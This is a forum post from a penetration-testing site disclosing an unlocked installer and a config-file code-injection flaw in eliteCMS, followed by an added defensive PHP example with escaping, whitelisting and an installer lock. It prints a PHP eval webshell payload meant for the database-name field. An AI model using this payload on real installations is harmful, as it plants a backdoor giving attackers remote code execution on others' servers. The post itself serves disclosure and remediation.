China Network Penetration Testing Alliance
Title: eliteCMS installer not locked after installation + one-liner webshell write vulnerability
Author: admin
Posted: 2012-11-18 13:59
The eliteCMS installer is not locked once installation has finished, so an attacker can re-run the installation simply by visiting the installer's URL.

The second vulnerability is that the installer writes a one-liner webshell straight into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    // Step 4 of the installer: config.php is generated as PHP source text
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated directly into the generated code
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The generated text is then written out to config.php
    $writer = fopen($file, 'w');
    ...
Now look at where those session values come from:
// Earlier installer step: the form fields are copied into the session as-is
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken over without any validation.

If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-liner backdoor is written into /admin/includes/config.php. With that value the generated line becomes define("DB_NAME", ""?><?php eval($_POST[c]);?><?php"); so the eval block does land in the file. Note, however, that the first PHP block is left with an unterminated define() call in front of the ?>, which PHP reports as a parse error for the whole file before executing any of it; the injected text has to keep the surrounding define() call syntactically balanced for the backdoor to actually be reachable.
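The following is an added example, not eliteCMS code and not part of the original post. It reproduces the installer's config writer from above, puts the posted payload through it, and shows two fixes a practitioner would apply: generate the config with var_export() (plus a whitelist) so user input can never leave the string literal, and refuse to run the installer when a lock file from a previous install exists. The function names, the lock-file name install.lock and the sample POST values are assumptions made for this example. The helper count_open_tags() lexes the generated file with PHP's own tokenizer and counts <?php open tags: a correctly generated config has exactly one, so a higher count means input broke out of the string.

```php
<?php
// Added example (not eliteCMS code): vulnerable config writer beside a
// hardened one, a tokenizer-based check, and an installer lock.
// Function names, install.lock and the sample values are assumptions.

// Vulnerable writer: mirrors the install.php step-4 logic, which
// interpolates the session values straight into PHP source text.
function build_config_vulnerable(array $v): string
{
    $w  = "<?php\n";
    $w .= "define(\"DB_SERVER\", \"{$v['DB_SERVER']}\");\n";
    $w .= "define(\"DB_NAME\", \"{$v['DB_NAME']}\");\n";
    $w .= "define(\"DB_USER\", \"{$v['DB_USER']}\");\n";
    $w .= "define(\"DB_PASS\", \"{$v['DB_PASS']}\");\n";
    $w .= "?>\n";
    return $w;
}

// Hardened writer: var_export() emits a single-quoted PHP literal with
// quotes and backslashes escaped, so whatever the user typed stays inside
// the string. Host, database and user names are also whitelisted first;
// the password may legitimately contain punctuation, so it is only escaped.
function build_config_safe(array $v): string
{
    $w = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $val = (string)($v[$key] ?? '');
        if ($key !== 'DB_PASS' && !preg_match('/^[A-Za-z0-9_.:-]{1,64}$/', $val)) {
            throw new InvalidArgumentException("invalid value for $key");
        }
        $w .= 'define(' . var_export($key, true) . ', ' . var_export($val, true) . ");\n";
    }
    return $w;
}

// Practitioner check: lex the generated file and count PHP open tags.
// A well-formed generated config has exactly one; more means user input
// escaped the string literal it was meant to sit in.
function count_open_tags(string $src): int
{
    $n = 0;
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === T_OPEN_TAG) {
            $n++;
        }
    }
    return $n;
}

// Installer lock: refuse to run if a previous install left a lock file,
// and create the lock once the configuration has been written.
function installer_locked(string $dir): bool
{
    return file_exists($dir . '/install.lock');
}

function lock_installer(string $dir): void
{
    file_put_contents($dir . '/install.lock', date('c') . "\n");
}

// Constructed sample input: the payload from the post placed in DB_NAME.
$post = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'elite',
    'DB_PASS'   => 's3cret',
];

echo "vulnerable writer, open tags: " . count_open_tags(build_config_vulnerable($post)) . "\n";

// The whitelist rejects the payload in DB_NAME outright.
try {
    build_config_safe($post);
} catch (InvalidArgumentException $e) {
    echo "safe writer rejected input: " . $e->getMessage() . "\n";
}

// Even in the unwhitelisted DB_PASS field the payload stays inside the
// single-quoted literal produced by var_export(), so only one open tag remains.
$clean = array_merge($post, ['DB_NAME' => 'elitecms', 'DB_PASS' => $post['DB_NAME']]);
echo "safe writer with payload in DB_PASS, open tags: " . count_open_tags(build_config_safe($clean)) . "\n";

// Lock demonstration in a temporary directory.
$tmp = sys_get_temp_dir() . '/elitecms-install-demo';
@mkdir($tmp);
echo "locked before install: " . var_export(installer_locked($tmp), true) . "\n";
lock_installer($tmp);
echo "locked after install: " . var_export(installer_locked($tmp), true) . "\n";
```

Running the script once shows the vulnerable writer producing more than one open tag for the payload while the hardened writer produces exactly one; running it a second time shows installer_locked() already true because install.lock persisted in the temp directory, which is the behaviour the real installer is missing. The exact open-tag count for the vulnerable output depends on the short_open_tag setting, since the trailing <?php" in the payload is not followed by whitespace.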
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/)